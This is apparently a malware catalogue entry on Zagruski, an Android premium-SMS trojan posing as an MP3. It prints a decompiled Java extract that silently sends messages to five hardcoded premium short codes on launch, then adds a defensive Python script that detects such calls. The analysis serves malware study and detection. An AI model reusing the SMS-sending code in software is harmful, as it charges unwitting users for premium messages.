Zagruski

2014-06-19

Summary

Premium SMS sending

GroDDViewer graphs:

Details

Zagruski is malware discovered in 2014. It looks like an MP3 file and sends overcharged (premium-rate) SMS messages each time the APK is launched.

Stage 1: Malicious code execution

Zagruski does not disturb the Android OS once set up. The overcharged SMS messages are sent once each time the application is launched.

Stage 2: SMS sending

Although the overcharged numbers are hardcoded inside the APK, it is not possible to track their destination.

Other resources

Triggering

To trigger the malware, launch the application.

Characteristics

Malware type :

Attacks :

  •   Normal use

Infection technique :

Malicious code type :

Hiding techniques :

Triggering techniques :

Samples

Java source code extracts:

ProgressBarActivity.java is the service started when the application is launched.

ProgressBarActivity.java

  public void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    setContentView(2130903040);
    // Exit immediately if the lock file already exists.
    if (new File("data/data/com.agewap.soft/files", "file.lock").exists()) {
      System.exit(0);
    }
    try
    {
      // Create the empty lock file (mode 1 is MODE_WORLD_READABLE).
      OutputStreamWriter lockWriter = new OutputStreamWriter(openFileOutput("file.lock", 1));
      lockWriter.flush();
      lockWriter.close();
      // Send the hardcoded message to the hardcoded numbers, with no user interaction.
      SmsManager smsManager = SmsManager.getDefault();
      smsManager.sendTextMessage("5373", null, "604+bigs 280 ajGEIk47Y", null, null);
      smsManager.sendTextMessage("7250", null, "604+bigs 280 ajGEIk47Y", null, null);
      smsManager.sendTextMessage("7250", null, "604+bigs 280 ajGEIk47Y", null, null);
      smsManager.sendTextMessage("7099", null, "604+bigs 280 ajGEIk47Y", null, null);
      smsManager.sendTextMessage("7030", null, "604+bigs 280 ajGEIk47Y", null, null);
      // Set up the progress bar and the handler that advances it.
      this.mProgressBar = ((ProgressBar)findViewById(2131034113));
      this.mHandler = new Handler()
      {
        public void handleMessage(Message paramAnonymousMessage)
        {
          ProgressBarActivity.this.mProgressBar.incrementProgressBy(1);
        }
      };
      super.onStart();
      if (this.mProgressBar.getProgress() == 100) {
        System.exit(0);
      }
      return;
    }
    catch (IOException localIOException)
    {
      // The exception handler is not part of the published extract.
    }
  }
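
Because the destination numbers and the message body are string literals in the decompiled source, they can be recovered statically. The following Python script is an added example, not part of the original analysis or of the sample: it scans decompiled Java text for sendTextMessage calls, lists hardcoded short-code destinations and counts those issued from launch-time lifecycle methods. The 3-6 digit short-code rule, the list of launch methods and the onClick call in the sample input are assumptions made for the example.

```python
import re
from collections import Counter

# sendTextMessage(<dest>, <scAddress>, <body>, ...) as it appears in decompiled Java.
CALL = re.compile(r'\.sendTextMessage\(\s*(?P<dest>"[^"]*"|[^,]+?)\s*,\s*[^,]+?\s*,'
                  r'\s*(?P<body>"(?:[^"\\]|\\.)*"|[^,]+?)\s*,')
METHOD = re.compile(r'\b(?:public|protected|private)\s+[\w<>\[\]]+\s+(\w+)\s*\(')
SHORT_CODE = re.compile(r'\d{3,6}')  # assumption: 3-6 digits is a short code
LAUNCH_METHODS = {"onCreate", "onStart", "onResume"}  # run without user action

def find_sms_calls(source):
    """Return one record per sendTextMessage call, tagged with its enclosing method."""
    calls, method = [], None
    for lineno, line in enumerate(source.splitlines(), 1):
        decl = METHOD.search(line)
        if decl:
            method = decl.group(1)  # heuristic: last method declared above the call
        for m in CALL.finditer(line):
            dest, body = m.group("dest"), m.group("body")
            number = dest[1:-1] if dest.startswith('"') else None  # None: set at run time
            calls.append({
                "line": lineno, "method": method, "dest": number,
                "body": body[1:-1] if body.startswith('"') else None,
                "short_code": bool(number and SHORT_CODE.fullmatch(number)),
            })
    return calls

def report(source):
    """Summarise hardcoded short-code destinations and sends made at launch."""
    calls = find_sms_calls(source)
    hits = [c for c in calls if c["short_code"]]
    return {
        "total_calls": len(calls),
        "hardcoded_short_codes": dict(Counter(c["dest"] for c in hits)),
        "dynamic_destinations": sum(c["dest"] is None for c in calls),
        "sent_on_launch": sum(c["method"] in LAUNCH_METHODS for c in hits),
    }

# Constructed sample: three of the extract's calls plus a hypothetical user-driven send.
SAMPLE = '''public void onCreate(Bundle paramBundle)
{
  paramBundle = SmsManager.getDefault();
  paramBundle.sendTextMessage("5373", null, "604+bigs 280 ajGEIk47Y", null, null);
  paramBundle.sendTextMessage("7250", null, "604+bigs 280 ajGEIk47Y", null, null);
  paramBundle.sendTextMessage("7250", null, "604+bigs 280 ajGEIk47Y", null, null);
}
public void onClick(View paramView)
{
  sms.sendTextMessage(userNumber, null, text, null, null);
}'''
```

Calling report(SAMPLE) returns the summary as a dictionary; find_sms_calls gives the per-call records with line numbers for triage.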
